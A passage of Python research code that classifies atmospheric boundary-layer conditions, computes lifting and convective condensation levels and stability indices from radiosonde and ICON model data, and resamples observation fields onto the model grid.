PBLclass[iTime, iHeight] = 2
# defining cloud driven bins
if (flagCloud[iTime, iHeight] == 0) & (flagTurb[iTime, iHeight] == 1) & (flagcloudDriven[iTime, iHeight] == 1):
PBLclass[iTime, iHeight] = 3
# defining convective bins
if (flagCloud[iTime, iHeight] == 0) & (flagTurb[iTime, iHeight] == 1) & (flagcloudDriven[iTime, iHeight] == 0) & (flagInstability[iTime, iHeight] == 1) & (flagSurfaceDriven[iTime, iHeight] == 1):
PBLclass[iTime, iHeight] = 4
# defining intermittent bins
if (flagCloud[iTime, iHeight] == 0) & (flagTurb[iTime, iHeight] == 1) & (flagcloudDriven[iTime, iHeight] == 0) & (flagInstability[iTime, iHeight] == 1) & (flagSurfaceDriven[iTime, iHeight] == 0):
PBLclass[iTime, iHeight] = 5
# defining wind shear bins
if (flagCloud[iTime, iHeight] == 0) & (flagTurb[iTime, iHeight] == 1) & (flagcloudDriven[iTime, iHeight] == 0) & (flagInstability[iTime, iHeight] == 0) & (flagWindShear[iTime, iHeight] == 1):
PBLclass[iTime, iHeight] = 6
if (flagCloud[iTime, iHeight] == 0) & (flagTurb[iTime, iHeight] == 1) & (flagcloudDriven[iTime, iHeight] == 0) & (flagInstability[iTime, iHeight] == 0) & (flagSurfaceDriven[iTime, iHeight] == 0) & (flagWindShear[iTime, iHeight] == 1):
PBLclass[iTime, iHeight] = 6
# defining intermittent bins
if (flagCloud[iTime, iHeight] == 0) & (flagTurb[iTime, iHeight] == 1) & (flagcloudDriven[iTime, iHeight] == 0) & (flagInstability[iTime, iHeight] == 0) & (flagWindShear[iTime, iHeight] == 0):
PBLclass[iTime, iHeight] = 5
return (PBLclass, flagCloud, flagTurb, flagcloudDriven, flagInstability, flagWindShear, flagSurfaceDriven, flagConnection)
# list of ordered variables : var_long_name =
# "Pressure", 0
# "Temperature", 1
# "Exner pressure", 2
# "Density", 3
# "virtual potential temperature", 4
# "zonal wind", 5
# "meridional wind", 6
# "orthogonal vertical wind", 7
# "specific humidity", 8
# "specific cloud water content", 9
# "specific cloud ice content", 10
# "rain_mixing_ratio", 11
# "snow_mixing_ratio", 12
# "relative humidity", 13
# "graupel_mixing_ratio", 14
# "graupel_mixing_ratio", 15
# "number concentration ice", 16
# "number concentration snow", 17
# "number concentration rain droplet", 18
# "number concentration graupel", 19
# "number concentration hail", 20
# "number concentration cloud water", 21
# "number concentration activated ice nuclei", 22
# "total specific humidity (diagnostic)", 23
# "total specific cloud water content (diagnostic)", 24
# "total specific cloud ice content (diagnostic)", 25
# "cloud cover", 26
# "turbulent diffusion coefficients for momentum", 27
# "turbulent diffusion coefficients for heat", 28
# "Pressure on the half levels", 29
# "soil temperature", 30
# "total water content (ice + liquid water)", 31
# "ice content" ; 32
# Version 1.0 released by David Romps on September 12, 2017.
#
# When using this code, please cite:
#
# @article{16lcl,
# Title = {Exact expression for the lifting condensation level},
# Author = {David M. Romps},
# Journal = {Journal of the Atmospheric Sciences},
# Year = {2017},
# Volume = {in press},
# }
#
# This lcl function returns the height of the lifting condensation level
# (LCL) in meters. The inputs are:
# - p in Pascals
# - T in Kelvins
# - Exactly one of rh, rhl, and rhs (dimensionless, from 0 to 1):
# * The value of rh is interpreted to be the relative humidity with
# respect to liquid water if T >= 273.15 K and with respect to ice if
# T < 273.15 K.
# * The value of rhl is interpreted to be the relative humidity with
# respect to liquid water
# * The value of rhs is interpreted to be the relative humidity with
# respect to ice
# - ldl is an optional logical flag. If true, the lifting deposition
# level (LDL) is returned instead of the LCL.
# - min_lcl_ldl is an optional logical flag. If true, the minimum of the
# LCL and LDL is returned.
def lcl(p,T,rh=None,rhl=None,rhs=None,return_ldl=False,return_min_lcl_ldl=False):
# function to calculate lcl height providing T in K and P in pascal, RH between 0 and 1.
import math
import scipy.special
import numpy as numpy
# Parameters
Ttrip = 273.16 # K
ptrip = 611.65 # Pa
E0v = 2.3740e6 # J/kg
E0s = 0.3337e6 # J/kg
ggr = 9.81 # m/s^2
rgasa = 287.04 # J/kg/K
rgasv = 461 # J/kg/K
cva = 719 # J/kg/K
cvv = 1418 # J/kg/K
cvl = 4119 # J/kg/K
cvs = 1861 # J/kg/K
cpa = cva + rgasa
cpv = cvv + rgasv
# The saturation vapor pressure over liquid water
def pvstarl(T):
return ptrip * (T/Ttrip)**((cpv-cvl)/rgasv) * \
math.exp( (E0v - (cvv-cvl)*Ttrip) / rgasv * (1/Ttrip - 1/T) )
# The saturation vapor pressure over solid ice
def pvstars(T):
return ptrip * (T/Ttrip)**((cpv-cvs)/rgasv) * \
math.exp( (E0v + E0s - (cvv-cvs)*Ttrip) / rgasv * (1/Ttrip - 1/T) )
# Calculate pv from rh, rhl, or rhs
rh_counter = 0
if rh is not None:
rh_counter = rh_counter + 1
if rhl is not None:
rh_counter = rh_counter + 1
if rhs is not None:
rh_counter = rh_counter + 1
if rh_counter != 1:
print(rh_counter)
exit('Error in lcl: Exactly one of rh, rhl, and rhs must be specified')
if rh is not None:
# The variable rh is assumed to be
# with respect to liquid if T > Ttrip and
# with respect to solid if T < Ttrip
if T > Ttrip:
pv = rh * pvstarl(T)
else:
pv = rh * pvstars(T)
rhl = pv / pvstarl(T)
rhs = pv / pvstars(T)
elif rhl is not None:
pv = rhl * pvstarl(T)
rhs = pv / pvstars(T)
if T > Ttrip:
rh = rhl
else:
rh = rhs
elif rhs is not None:
pv = rhs * pvstars(T)
rhl = pv / pvstarl(T)
if T > Ttrip:
rh = rhl
else:
rh = rhs
if pv > p:
return np.nan
# Calculate lcl_liquid and lcl_solid
qv = rgasa*pv / (rgasv*p + (rgasa-rgasv)*pv)
rgasm = (1-qv)*rgasa + qv*rgasv
cpm = (1-qv)*cpa + qv*cpv
if rh == 0:
return cpm*T/ggr
aL = -(cpv-cvl)/rgasv + cpm/rgasm
bL = -(E0v-(cvv-cvl)*Ttrip)/(rgasv*T)
cL = pv/pvstarl(T)*math.exp(-(E0v-(cvv-cvl)*Ttrip)/(rgasv*T))
aS = -(cpv-cvs)/rgasv + cpm/rgasm
bS = -(E0v+E0s-(cvv-cvs)*Ttrip)/(rgasv*T)
cS = pv/pvstars(T)*math.exp(-(E0v+E0s-(cvv-cvs)*Ttrip)/(rgasv*T))
lcl = cpm*T/ggr*( 1 - \
bL/(aL*scipy.special.lambertw(bL/aL*cL**(1/aL),-1).real) )
ldl = cpm*T/ggr*( 1 - \
bS/(aS*scipy.special.lambertw(bS/aS*cS**(1/aS),-1).real) )
# Return either lcl or ldl
if return_ldl and return_min_lcl_ldl:
exit('return_ldl and return_min_lcl_ldl cannot both be true')
elif return_ldl:
return ldl
elif return_min_lcl_ldl:
return min(lcl,ldl)
else:
return lcl
def f_resamplingfield(FieldStart,datetimeFieldStart,ICON_DF):
# goal: function to resample the 1d time seried of the scalar field 1dFieldStart
# having dimension equal to the length of the array datetime1dFieldStart,
# to the time resolution provided in the dataframe ICON_DF, which is defined
# externally and provided to the function as input. ICON_DF represent the
# data resolution we want to obtain with this resampling. An example of the
# definition of such dataframe is:
# ICON_DF = pd.DataFrame(cloudMask_ICON, index = datetime_ICON, columns = height_ICON)
# data: 22 July 2019
# author: Claudia Acquistapace
# output: dataframe of the same time res of the desired res
import pandas as pd
FieldStart_DF = pd.DataFrame(FieldStart, index=datetimeFieldStart)
SelectedIndex = getIndexListsuka(FieldStart_DF, ICON_DF.index)
values = np.arange(0, len(ICON_DF.index))
Field_resampled = pd.DataFrame(values, index=ICON_DF.index)
Field_resampled = getResampledDataPd(Field_resampled, FieldStart_DF, SelectedIndex)
return(Field_resampled)
def f_resampling_twoD_Field(FieldStart,datetimeFieldStart,heightFieldStart, ICON_DF, ICON_DF_T):
# goal: resample the 2d field on the grid indicated by the second field
# provided in ICON_DF. The code first resamples in time and then it resamples in
# height applying the same metholodogy but to reversed arrays
# definition of such dataframe is:
# ICON_DF = pd.DataFrame(cloudMask_ICON, index = datetime_ICON, columns = height_ICON)
# data: 22 July 2019
# author: Claudia Acquistapace
# output: dataframe of the same time and height desired
import pandas as pd
FieldStart_DF = pd.DataFrame(FieldStart, index=datetimeFieldStart, columns=heightFieldStart)
SelectedIndex = getIndexList(FieldStart_DF, ICON_DF.index)
values = np.zeros((len(ICON_DF.index),len(heightFieldStart)))
FieldResampled = pd.DataFrame(values, index=ICON_DF.index, columns=heightFieldStart)
FieldResampled = getResampledDataPd(FieldResampled, FieldStart_DF, SelectedIndex)
FieldTransposed = FieldResampled.values.transpose()
FieldTrans_DF = pd.DataFrame(FieldTransposed, index=heightFieldStart, columns=ICON_DF.index)
SelectedCols = getIndexList(FieldTrans_DF, ICON_DF_T.index)
valuesTrans = np.zeros((len(ICON_DF.columns), len(ICON_DF.index)))
FieldTranspLess = pd.DataFrame(FieldTransposed, index=heightFieldStart, columns=ICON_DF.index)
FieldFinalRes = pd.DataFrame(valuesTrans, index=ICON_DF.columns, columns=ICON_DF.index)
FieldFinalRes = getResampledDataPd(FieldFinalRes, FieldTranspLess, SelectedCols)
return(FieldFinalRes)
def f_downscaleScalarfield(scalarField, datetimehighRes, ICON_DF):
# goal: function to downscale the resolution of fields having higher
# resolutions compared to ICON_DF
# date: 23 July 2019
# author: claudia Acquistapace (cacquist@meteo.uni-koeln.de)
# output: pandas dataframe of the same scalar field downscaled
dimLowRes = len(ICON_DF.index)
datetimeLowRes = ICON_DF.index
scalarField[scalarField == -99.] = np.nan
scalarField_DF = pd.DataFrame(scalarField, index=datetimehighRes)
lowResField = []
for iTime in range(dimLowRes-1):
timeStart = datetimeLowRes[iTime]
timeEnd = datetimeLowRes[iTime+1]
indSel = (scalarField_DF.index < timeEnd) * (scalarField_DF.index > timeStart)
#print(indSel)
lowResField.append(np.nanmean(scalarField_DF.values[indSel]))
return(np.array(lowResField))
def f_downscalevectorfield(vectorField, datetimehighRes, heightField, ICON_DF):
# goal: function to downscale the resolution of fields having higher
# resolutions compared to ICON_DF
# date: 23 July 2019
# author: claudia Acquistapace (cacquist@meteo.uni-koeln.de)
# output: array of the same scalar field downscaled
dimLowRes = len(ICON_DF.index)
datetimeLowRes = ICON_DF.index
vectorField[vectorField == -99.] = np.nan
vectorField_DF = pd.DataFrame(vectorField, index=datetimehighRes, columns=heightField )
lowResVectorField = pd.DataFrame(np.zeros((len(ICON_DF.index), len(heightField))), index=ICON_DF.index,\
columns=heightField )
for iTime in range(dimLowRes-1):
timeStart = datetimeLowRes[iTime]
timeEnd = datetimeLowRes[iTime+1]
maskT = (vectorField_DF.index < timeEnd) * (vectorField_DF.index > timeStart)
#print(indSel)
lowResVectorField.values[iTime,:] = np.nanmean(vectorField_DF.values[maskT, :], axis=0)
return(lowResVectorField)
def f_processRadiosondesDay(fileList, yy, mm, dd):
# goal: process radiosoundings and calculating quantities of interest for the analysis
# author: claudia Acquistapace
# date; 24 July 2019 (heat wave in Cologne)
# contact: cacquist@meteo.uni-koeln.de
# output: list of dictionaries. Each dictionary is for a specific hour of the day
# and contains 'time', 'P', T', 'Td', 'Td_surf','RH','z_lcl','z_ccl','T_ccl'
# names of the variables in the radiosondes profiles
cols = ['Zeit [min:sec]','P [hPa]','T [C]','U [%]','Wind speed [m/s]','Wdir [inf]','Lange [inf]'\
,'Breite [inf]','Hˆhe [m]','Geo Pot [m]', 'dew [C]', 'Tv [C]','Rs [m/s]', 'D [kg/m3]' \
,'Azimut []','Elevation []','Entfernung [m]']
cols2 = ['Zeit [min:sec]','P [hPa]','T [C]','U [%]','Wind speed [m/s]','Wdir [inf]','Lange [inf]'\
,'Breite [inf]','Hˆhe [m]','Geo Pot [m]', 'dew [C]', 'Tv [C]','Rs [m/s]', 'D [kg/m3]']
Nfiles = len(fileList)
RadiosondesData = []
for iFile in range(Nfiles):
dayFile = fileList[iFile][44:52]
hourFile = int(fileList[iFile][52:54])
DatetimeRadiosonde = datetime.datetime(int(yy), int(mm), int(dd), hourFile, 0, 0)
print(dayFile, hourFile)
if dayFile == '20130414':
#print('def correct for 14 columns')
DF = pd.read_csv(fileList[iFile], sep='\t', skipinitialspace=True, \
encoding='latin_1', names=cols2, header=0, dtype={'Hˆhe [m]':str})
else:
#print('def correct for 17 columns')
DF = pd.read_csv(fileList[iFile], sep='\t', skipinitialspace=True, \
encoding='latin_1', names=cols, header=0, dtype={'Hˆhe [m]':str})
DF[DF.columns] = DF[DF.columns].apply(pd.to_numeric, errors='coerce')
#print(iFile, fileList[iFile], DF.dtypes)
# ---- reading variables in the file
P = DF.values[:,1] # in [hPa]
T = DF.values[:,2]
U = DF.values[:,3]
Hwind = DF.values[:,4]
Wdir = DF.values[:,5]
Td = DF.values[:,10]
Td = Td + 273.15
T = T + 273.15
height = DF.values[:,8]
# =============================================================================
# for ind in range(len(height)):
# #print(ind, height[ind])
# height[ind] = height[ind].strip()
# if height[ind] == '-----':
# height[ind] =np.nan
# height[ind] == float(height[ind])
# else:
# height[ind] = float(height[ind].strip())
#
# =============================================================================
#print(hourFile)
Ndata = len(DF.count(axis='columns'))
#print(DF.values[:,4])
#type(DF.values[:,4])
# ---- Calculating RH for radiosondes from Td (Td = 1/To - Rv/L log(e/eo)^-1) from stull
# RH = e/es ; es is from clausius clapeyron while e is obtained from the formula for td
e0 = 0.611 # Kpa
T0 = 273.15 # K
cost_lrv = 5423. # K (Lv/Rv)
L = 5.6 * 10 ** 6 # J/Kg
e = []
es = []
RH = []
for indData in range(Ndata):
e.append(e0 * np.exp(cost_lrv*(T0**(-1)-Td[indData]**(-1))))
es.append(e0 * np.exp(cost_lrv*(T0**(-1)-T[indData]**(-1))))
RH.append(100*(e0 * np.exp(cost_lrv*(T0**(-1)-Td[indData]**(-1))))/ \
(e0 * np.exp(cost_lrv*(T0**(-1)-T[indData]**(-1)))))
# ---- finding height where RH = 100%
ind_sat = []
for indData in range(1,Ndata,+1):
if ((RH[indData-1] < 100.) and (RH[indData] > 100.)):
ind_sat = indData
break
#z_sat = height[ind_sat]
# ---- calculating CCL from radiosoundings
# ---- calculating the saturation mixing ratio for td at the surface (assuming RH =100%)
# defining constants
#cost_rvl = np.power(5423,-1.) #K
Rv = 461 # J K^-1 Kg^-1
epsilon = 0.622
Td_surf = Td[0]
P_surf = P[0]
T_surf = T[0]
# step 1: calculating due point temperature profile for each time was done at the previous step
# step 2: calculating mixing ratio M0 at the surface for T = Td and P=Psurf
M0 = epsilon*e0*np.exp((1./Rv)*(T0**(-1.)-Td_surf**(-1.))) / \
(P_surf*0.1 - e0*np.exp((1./Rv)*(T0**(-1.)-Td_surf**(-1.))))
# step 3: calculating Td(m=m0, P) for every P value and assigning Z_ccl when there's a level i of P for which
# T(P)i-1 < Td(m0,P)i < T(P)i+1. If the level is found, assign T_star = T(P)i and Z_ccl as the height
# corresponding to that pressure height.
dimHeight = len(height)
Tdm0_profile = np.zeros((dimHeight))
Tdm0_profile.fill(np.nan)
indCCLprofile = []
for indHeight in range(dimHeight - 1):
Pkpa = P[indHeight] * 0.1
Tdm0_profile[indHeight] = 1 / (
(1 / T0) - ((1 / L) * Rv * np.log((M0 * Pkpa) / (e0 * epsilon))))
if T[0] > Tdm0_profile[indHeight]:
if (T[indHeight] > Tdm0_profile[indHeight]) and (
T[indHeight + 1] < Tdm0_profile[indHeight]):
indCCLprofile.append(indHeight)
else:
if (T[indHeight] < Tdm0_profile[indHeight]) and (
T[indHeight + 1] > Tdm0_profile[indHeight]):
indCCLprofile.append(indHeight)
#pathFig = '/work/cacquist/HDCP2_S2/statistics/figs/patch003/figures_JAMES/debugging/radiosondes/'
#fig, ax = plt.subplots(figsize=(12, 5))
#plt.plot(Tdm0_profile, height, label='TDm0')
#plt.plot(T[:], height, label='T')
#plt.legend()
#plt.ylim(0, 6000)
#plt.savefig(pathFig + str(dayFile) + '_' + str(hourFile) + 'radiosonde_Check.png', format='png')
#print(len(indCCLprofile))
if len(indCCLprofile) == 0:
z_ccl = np.nan
T_cclTop = np.nan
else:
z_ccl = np.nanmin(height[indCCLprofile])
T_cclTop = np.nanmin(T[np.nanargmin(height[indCCLprofile])])
Ad_rate = -9.8 # K/Km
T_ground_CCL = []
# ---- finding z(CCL) using the dry adiabatic lapse rate
T_ground_CCL = float(T_cclTop) - Ad_rate* float(z_ccl)*10.**(-3)
# ---- calculating LCL height
#------ calculating LCL heights from tower measurements resampled
# important: provide pressure in Pascals, T in K, RH in 70.3
#---------------------------------------------------------------------------------
from myFunctions import lcl
z_lcl = lcl(np.array(P_surf*100),np.array(T_surf),np.array(RH[0])/100.)
# ------------------------------------------------------------------
# calculate LTS index for lower tropospheric stability (Wood and Bretherton, 2006)
# ------------------------------------------------------------------
from myFunctions import f_closest
Pthr = 700 * 100. # Pressure level of 700 Hpa used as a reference
# calculating height of the surface
indP700 = f_closest(P*100.,Pthr)
Theta = []
Cp = 1004.
Rl = 287.
for ind in range(len(height)):
Theta.append(T[ind]*((100000./(P[ind]*100.))**(Rl/Cp))) # potential temperature in K
LTS = Theta[indP700] - Theta[0]
#------------------------------------------------------------------
# calculate EIS index for lower tropospheric stability (Wood and Bretherton, 2006) for observations
# ------------------------------------------------------------------
g = 9.8 # gravitational constant [ms^-2]
Cp = 1005.7 # specific heat at constant pressure of air [J K^-1 Kg^-1]
Lv = 2256 # latent heat of vaporization of water [kJ/kg]
R = 8.314472 # gas constant for dry air [J/ molK]
epsilon = 0.622 # ratio of the gas constants of dry air and water vapor
# ---- calculating mixing ratio
mr =[]
for indHeight in range(len(height)):
mr.append((0.622*e[indHeight]*100.)/(P[indHeight]*100.-e[indHeight]*100.)) # water vapor mixing ratio in kg/kg
# ---- calculating saturation mixing ratio
ws = [] #mpcalc.saturation_mixing_ratio(P, T)
for indHeight in range(len(height)):
ws.append(epsilon* (es[indHeight]/(P[indHeight]- es[indHeight]))) # saturation water vapor mixing ratio kg/Kg
gamma_moist = []
gamma_moist_atmos = []
# calculating moist adiabatic lapse rate
for indHeight in range(len(height)):
gamma_moist.append(g*((1.+(Lv*mr[indHeight])/(R*T[indHeight]))/(Cp \
+ (mr[indHeight]*epsilon*Lv**2)/(R*T[indHeight]**2))))
Ws_array = np.asarray(ws)
T_array = np.asarray(T)
gamma_moist_atmos = atmos.equations.Gammam_from_rvs_T(Ws_array.astype(float), T_array.astype(float))
indP700 = f_closest(P*100.,Pthr)
gamma_moist_700 = gamma_moist[indP700]
z_700 = height[indP700]
#print('here')
#print(float(z_lcl))
#for ind in range(len(height)):
# print((height[ind]))
#print(f_closest(height, float(z_lcl)))
ind_lcl = f_closest(height, float(z_lcl))
gamma_lcl = gamma_moist[ind_lcl]
# finding height corresponding to 700 HPa
EIS = LTS - gamma_moist_700*z_700 + gamma_lcl*float(z_lcl)
EIS_atmos = LTS - gamma_moist_atmos[indP700]*z_700 + gamma_moist_atmos[ind_lcl]*float(z_lcl)
#print('EIS obtained from the Wood and Bretherton formula:')
#print(EIS)
# calculating profiles of virtual potential temperature
Theta_v = []
Rd = 287.058 # gas constant for dry air [Kg-1 K-1 J]
for indHeight in range(len(height)):
k = Rd*(1-0.23*mr[indHeight])/Cp
Theta_v.append( (1 + 0.61 * mr[indHeight]) * T[indHeight] * (1000./P[indHeight])**k)
# calculating EIS with the methodology of maximum deltaTheta_v
Delta_ThetaV = [x - Theta_v[i - 1] for i, x in enumerate(Theta_v)][1:]
# cutting profiles at 4000mt height
indCut = f_closest(height, 3500.)
Delta_ThetaV= Delta_ThetaV[0:indCut]
#print('il massimo shift risulta :')
#print(np.max(Delta_ThetaV))
#print(np.argmax(Delta_ThetaV))
EIS_height = height[np.argmax(Delta_ThetaV)]
#print('e si trova ad altezza:')
#print(EIS_height)
EIS2 = Theta_v[np.argmax(Delta_ThetaV)]- Theta_v[0]
#print('EIS obtained with the maximum deltaTheta virtual difference:')
#print(EIS2)
#print('da qui')
# ------------------------------------------------------------------------------
# calculating PBL height
# ------------------------------------------------------------------------------
dimHeight = len(height)
g=9.8 # gravity constant
Rithreshold=0.25 # Threshold values for Ri
Rithreshold2=0.2
zs=height[0] # height of the surface reference
RiMatrix=np.zeros((dimHeight)) # Richardson number matrix
PBLheightArr=[]
RiCol=np.zeros((dimHeight))
# calculating richardson number matrix
thetaS=Theta_v[0]
for iHeight in range(dimHeight):
if isinstance((DF.values[iHeight,4]), float):
den = DF.values[iHeight,4]**2
if isinstance((DF.values[iHeight,4]), str):
if (DF.values[iHeight,4] == '----- '):
den == 0.
else:
den = (float(DF.values[iHeight,4].strip()))**2
if den == 0.:
RiMatrix[iHeight] = 0.
else:
RiMatrix[iHeight] = (1/den) * (g/thetaS) * (Theta_v[iHeight]-thetaS)*(height[iHeight]-zs)
# find index in height where Ri > Rithreshold
RiCol=RiMatrix[:]
# averaging lowest 100 mt of Ri matrix values
indHeightMean = np.where(height < 100.)
RImeanval = np.nanmean(RiCol[indHeightMean])
RiCol[indHeightMean] = np.repeat(RImeanval, len(indHeightMean))
#print(RiCol)
#print(np.where(RiCol > Rithreshold2)[0][:])
#print(len(np.where(RiCol > Rithreshold)[0][:]))
if len(np.where(RiCol > Rithreshold)[0][:]) != 0:
PBLheight = (height[np.where(RiCol > Rithreshold)[0][0]] - height[0])
else:
PBLheight = 0.
# ---- saving variables in dictionary: every dictionary for one hour
dict_day = {
'time':DatetimeRadiosonde,
'P':P,
'T':T,
'Td': Td,
'Td_surf': Td[0],
'RH':RH,
'z_lcl':z_lcl,
'z_ccl':z_ccl,
'T_ccl':T_ground_CCL,
'PBLheight':PBLheight,
'EISWood':EIS,
'EIS2':EIS2,
'LTS':LTS,
'theta_v':Theta_v,
'surfaceTemperature':T_surf,
'height':height,
}
# appending to a list: the list is for the day
RadiosondesData.append(dict_day)
return(RadiosondesData)
def f_calcThermodynamics(P,Q,T, LTS, time, height, Hsurf, date):
"""
author: claudia Acquistapace
date; 25 July 2019 (heat wave in Cologne)
contact: cacquist@meteo.uni-koeln.de
goal: derive thermodinamic quantities of interest for the analysis:
output: dictionary containing the following variables:
'mixingRatio':r,
'relativeHumidity':rh,
'virtualTemperature':tv,
'cclHeight':result_ccl['z_ccl'],
'cclTemperature':result_ccl['T_ccl'],
'lclHeight':lclArray,
'surfaceTemperature':TSurf,
'virtualPotentialTemperature':Theta_v,
'time':time,
'height':height,
'LTS':LTS,
input: matrices of Pressure (pa),
temperature (K),
absolute humidity (Kg/Kg),
time,
height,
height of the surface
"""
r = np.zeros((len(time), len(height)))
rh = np.zeros((len(time), len(height)))
tv = np.zeros((len(time), len(height)))
# calculation of mixing ratio and relative humidity
T0 = 273.15
for iTime in range(len(time)):
for iHeight in range(len(height)):
r[iTime,iHeight] = (Q[iTime, iHeight])/(1-Q[iTime, iHeight])
rh[iTime,iHeight] = 0.263*P[iTime, iHeight] * \
Q[iTime, iHeight] * (np.exp( 17.67 * (T[iTime, iHeight]-T0) / (T[iTime, iHeight] - 29.65)))**(-1)
#print('RH', rh[0,0], rh[0,-1])
#print('pressure ' , P[0,0]*0.001, P[0,-1]*0.001)
#print('temp', T[0,0], T[0,-1])
# calculation of virtual temperature
for indH in range(len(height)-1, 0, -1):
tv[:,indH] = T[:,indH]*(1+0.608 * Q[:,indH])
# calculation of convective condensation level (CCL) height and temperature
from myFunctions import f_CCL_new # input variables: T, P, RH, height, time, date
#(provide temperaturein K, RH in % ( 70.14), P In Kpa)
result_ccl = f_CCL_new(T, P*0.001, rh, height, time, date)
#print(result_ccl['z_ccl'])
# DatasetOut = {'time':time,
# 'height':height,
# 'z_ccl':z_ccl,
# 'T_ground_ccl':T_ground_CCL,
# 'T_top_ccl':T_cclTop,
# 'T_dew':Td}
from myFunctions import lcl # T in K and P in pascal
indSurf = len(height)-1
PSurf = P[:,indSurf]
TSurf = T[:,indSurf] # T in K
rhSurf = rh[:,indSurf-1]
lclArray = []
for iTime in range(len(time)):
lclArray.append(lcl(PSurf[iTime],TSurf[iTime],rhSurf[iTime]/100.))
# calculation of potential and virtual potential temperature (P in pascal)
Rd = 287.058 # gas constant for dry air [Kg-1 K-1 J]
Cp = 1004.
Theta = np.zeros((len(time), len(height)))
Theta_v = np.zeros((len(time), len(height)))
for indTime in range(len(time)):
for indHeight in range(len(height)):
k_val = Rd*(1-0.23*r[indTime, indHeight])/Cp
Theta_v[indTime, indHeight] = ( (1 + 0.61 * r[indTime, indHeight]) * \
T[indTime, indHeight] * (100000./P[indTime, indHeight])**k_val)
Theta[indTime, indHeight] = T[indTime, indHeight] * (100000./P[indTime, indHeight])**k_val
ThermodynPar={'mixingRatio':r,
'relativeHumidity':rh,
'virtualTemperature':tv,
'cclHeight':result_ccl['z_ccl'],
'cclTemperature':result_ccl['T_ground_ccl'],
'lclHeight':lclArray,
'surfaceTemperature':TSurf,
'virtualPotentialTemperature':Theta_v,
'potentialTemperature':Theta,
'time':time,
'height':height,
'LTS':LTS,
}
return(ThermodynPar)
# =============================================================================
# OBSOLETE FUNCTION >> Calculation of variance, wind speed, with direction for model outputs
# are done in t he f_processModelOutput.py function
# def f_calcDynamics(w,u,v,thetaV,time,height,timeWindow):
#
# # calculating variance of vertical velocity
# from myFunctions import f_calcWvariance
# #print('calculating variance of vertical velocity for observations')
# varW = f_calcWvariance(w,time,height,timeWindow)
#
# #print('Calculating PBL height with Richardson number method')
# from myFunctions import f_calcPblHeightRN
# PBLHeightArr = f_calcPblHeightRN(thetaV,u,v,height,time)
#
# # calculation of wind direction and intensity for model output
# windData_ICON = f_calcWindSpeed_Dir(time, height, v, u)
# #print('wind speed and direction calculated for ICON-LEM ')
#
# DynPar={'varianceW':varW,
# 'PBLHeight':PBLHeightArr,
# 'windSpeed':windData_ICON['windSpeed'],
# 'windDirection':windData_ICON['windDirection'],
# }
# return(DynPar)
#
# =============================================================================
def f_resamplingMatrixCloudnet(time2change, height2change, matrix2change, timeRef, heightRef, matrixRef):
# resampling Cloudnet observations on ICON time/height resolution
# ---- defining ICON data as dataframe reference
ICON_DF = pd.DataFrame(matrixRef, index=timeRef, columns=heightRef)
values = np.empty((len(timeRef), len(height2change)))
# ---- resampling PBL classification on ICON resolution
print('resampling CLOUDNET observations on ICON time resolution')
ZE_DF = pd.DataFrame(matrix2change, index=time2change, columns=height2change)
SelectedIndex_ZE = getIndexList(ZE_DF, ICON_DF.index)
ZE_resampled = pd.DataFrame(values, index=timeRef, columns=height2change)
ZE_resampled = getResampledDataPd(ZE_resampled, ZE_DF, SelectedIndex_ZE)
# ---- defining ICON data as dataframe reference
ICON_DF_T = pd.DataFrame(matrixRef.transpose(), index=heightRef, columns=timeRef)
ZE_values = ZE_resampled.values.transpose()
ZEFinal_DF = pd.DataFrame(ZE_values, index=height2change, columns=timeRef)
Selectedcol_ZEfinal = getIndexList(ZEFinal_DF, ICON_DF_T.index)
# define empty values for dataframe finer resolved
values_ZEfinal = np.empty((len(heightRef), len(timeRef)))
# define dataframe coarse resolution
ZE_less = pd.DataFrame(ZE_values, index=height2change, columns=timeRef)
# define output dataframe with resolution as icon
ZE = pd.DataFrame(values_ZEfinal, index=heightRef, columns=timeRef)
ZE = getResampledDataPd(ZE, ZE_less, Selectedcol_ZEfinal)
matrix = np.ma.array(ZE.values, mask=np.isnan(ZE.values))
return(matrix)
def f_calculateAllCloudQuantities(CloudInfo, \
time, \
height, \
LWP, \
LWC, \
humanInfo, \
Hwind, \
Wwind, \
yy, \
dd, \
mm, \
QiThreshold, \
QcThreshold, \
iconLemData, \
device, \
verboseFlag, \
debuggingFlag, \
pathDebugFig):
"""
@ author : claudia acquistapace
@ date : 30 july 2019
@ modified: 11 November 2019
@ contact : cacquist@meteo.uni-koeln.de
@ goal : code develop to calculate cloud base, cloud top, cloud fraction, when they are not
# previously calculated, for observations and model in the same way.
# In addition, it identifies cloud units and counts the amount of clouds detected during
# the day and for obs and model, it derives duration, chord length, massFlux and cloudLWP
@ input :
# - CloudInfo: this input variable is - cloudnet target categorization data matrix for obs (cloudnet_res.data)
# - cloud mask for the model output
# - time
# - height
# - LWP
# - LWC: this variable corresponds to the matrix of reflectivity in linear scale when processing the observations, \
# and corresponds to Qc matrix (filtered with respect to the Qc threshold for model data, when processing is done for ICON LEM
# - cloudTimeArray: array indicating starting and ending time for the day of the PBl cloud period
# - Hwin
# - Wwind
# - QiThreshold: threshold value to consider for reading Qi matrix from iconlem model output
# - QcThreshold: threshold value to consider for reading Qc matrix from iconlem model output
# - iconLemData: data structure containing iconlem extracted variables
# - device: string specifying if observations ('obs') or model data ('iconlem') are processed.
@ output: dictionary containing
# cloudMask':cloudMask,
# 'cloudBase':CB_array,
# 'cloudTop':CT_array,
# 'liquidCloudFraction':mean_CF_liquid (mean profiles calculated over 30 minutes)
# 'iceCloudFraction':mean_CF_ice (mean profiles calculated over 30 minutes)
# 'totalCloudFraction':mean_CF_tot (mean profiles calculated over 30 minutes)
# 'datetimeCloudFraction':datetime_CF (corresponding mean time array for cloud fraction)
# 'heightCloudFraction':height,
# 'duration':duration of each cloud found.
# 'cloudLWP':cloudLWP of each cloud found.
# 'chordLength':chordLength of each cloud found.
# 'massFlux':massFlux of each cloud found.
# 'Nclouds':Nclouds,
"""
from myFunctions import f_cloudmask
from myFunctions import f_calcCloudBaseTopPBLcloudsV2
from myFunctions import f_calcCloudBaseTopPBLclouds
from myFunctions import f_closest
from myFunctions import f_calculateCloudFractionICON
from myFunctions import f_calculateCloudProperties
from cloudnetFunctions import f_calculateCloudFractionCloudnet
from cloudnetFunctions import f_calculateCloudMaskCloudnet
from myFunctions import f_plotTest
date = str(yy)+str(mm)+str(dd)
# checking if the input is model or observations: in this case calculation
# of CB, CT, cloud fraction, cloud mask, reassignement of the variable LWC
# to ZE_lin as it really is, filtering Ze between cloud base and cloud top
# and calculating corresponding LWC profile for each CB/CT identified
if device == 'obs':
stringData = 'obs'
# calculating cloud mask for obs
CategoryCN_res = CloudInfo.data
